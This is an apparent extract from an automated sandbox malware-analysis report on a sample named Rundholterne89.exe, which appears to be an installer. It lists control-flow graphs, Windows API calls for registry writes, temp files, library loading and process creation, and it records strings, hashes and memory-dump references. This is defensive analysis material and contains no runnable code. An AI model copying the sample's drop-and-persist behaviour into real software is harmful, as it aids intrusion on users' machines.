                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%s.dll$UXTHEME$\
                                                                                            • API String ID: 2200240437-4240819195
                                                                                            • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                            • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                                                            • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                            • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 768 4059d1-4059db 769 4059dc-405a07 GetTickCount GetTempFileNameA 768->769 770 405a16-405a18 769->770 771 405a09-405a0b 769->771 772 405a10-405a13 770->772 771->769 773 405a0d 771->773 773->772
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 004059E5
                                                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                                            • "C:\Users\user\Desktop\Rundholterne89.exe", xrefs: 004059D1
                                                                                            • nsa, xrefs: 004059DC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: "C:\Users\user\Desktop\Rundholterne89.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                            • API String ID: 1716503409-3221393730
                                                                                            • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                            • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                                            • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                            • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 774 401bca-401be2 call 402a1d * 2 779 401be4-401beb call 402a3a 774->779 780 401bee-401bf2 774->780 779->780 782 401bf4-401bfb call 402a3a 780->782 783 401bfe-401c04 780->783 782->783 786 401c06-401c1a call 402a1d * 2 783->786 787 401c4a-401c70 call 402a3a * 2 FindWindowExA 783->787 798 401c3a-401c48 SendMessageA 786->798 799 401c1c-401c38 SendMessageTimeoutA 786->799 797 401c76 787->797 800 401c79-401c7c 797->800 798->797 799->800 801 401c82 800->801 802 4028cf-4028de 800->802 801->802
                                                                                            APIs
                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Timeout
                                                                                            • String ID: !
                                                                                            • API String ID: 1777923405-2657877971
                                                                                            • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                            • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                                                            • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                            • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 805 401f90-401f9c 806 401fa2-401fb8 call 402a3a * 2 805->806 807 402057-402059 805->807 816 401fc7-401fd5 LoadLibraryExA 806->816 817 401fba-401fc5 GetModuleHandleA 806->817 808 4021c4-4021c9 call 401423 807->808 814 4028cf-4028de 808->814 819 401fd7-401fe4 GetProcAddress 816->819 820 402050-402052 816->820 817->816 817->819 822 402023-402028 call 404f48 819->822 823 401fe6-401fec 819->823 820->808 828 40202d-402030 822->828 824 402005-402021 823->824 825 401fee-401ffa call 401423 823->825 824->828 825->828 836 401ffc-402003 825->836 828->814 829 402036-40203e call 40364f 828->829 829->814 835 402044-40204b FreeLibrary 829->835 835->814 836->828
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,774D23A0), ref: 00404FA4
                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 2987980305-0
                                                                                            • Opcode ID: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
                                                                                            • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                                            • Opcode Fuzzy Hash: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
                                                                                            • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 837 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 844 4023b0-4023b8 837->844 845 4028cf-4028de 837->845 847 4023c8-4023cb 844->847 848 4023ba-4023c7 call 402a3a lstrlenA 844->848 851 4023db-4023de 847->851 852 4023cd-4023da call 402a1d 847->852 848->847 854 4023e0-4023ea call 402e9f 851->854 855 4023ef-402403 RegSetValueExA 851->855 852->851 854->855 859 402405 855->859 860 402408-4024de RegCloseKey 855->860 859->860 860->845
                                                                                            APIs
                                                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                            • lstrlenA.KERNEL32(00409C10,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                            • RegSetValueExA.ADVAPI32(?,?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 1356686001-0
                                                                                            • Opcode ID: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
                                                                                            • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                                            • Opcode Fuzzy Hash: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
                                                                                            • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28
                                                                                            APIs
                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,774D3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                              • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,00000000,00000000,000000F0), ref: 00401634
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 00401629
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                            • String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian
                                                                                            • API String ID: 1892508949-2640575136
                                                                                            • Opcode ID: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
                                                                                            • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                                                            • Opcode Fuzzy Hash: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
                                                                                            • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                                                              • Part of subcall function 00403F60: SendMessageA.USER32(00010494,00000000,00000000,00000000), ref: 00403F72
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3748168415-3916222277
                                                                                            • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                            • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                                                            • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                            • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                                                            APIs
                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                            • CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                            Strings
                                                                                            • Error launching installer, xrefs: 004054D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID: Error launching installer
                                                                                            • API String ID: 3712363035-66219284
                                                                                            • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                            • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                                                            • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                            • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                                                            APIs
                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,774D23A0), ref: 00404FA4
                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                              • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                              • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 3521207402-0
                                                                                            • Opcode ID: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
                                                                                            • Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
                                                                                            • Opcode Fuzzy Hash: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
                                                                                            • Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
                                                                                            APIs
                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3677997916-0
                                                                                            • Opcode ID: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
                                                                                            • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                                            • Opcode Fuzzy Hash: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
                                                                                            • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
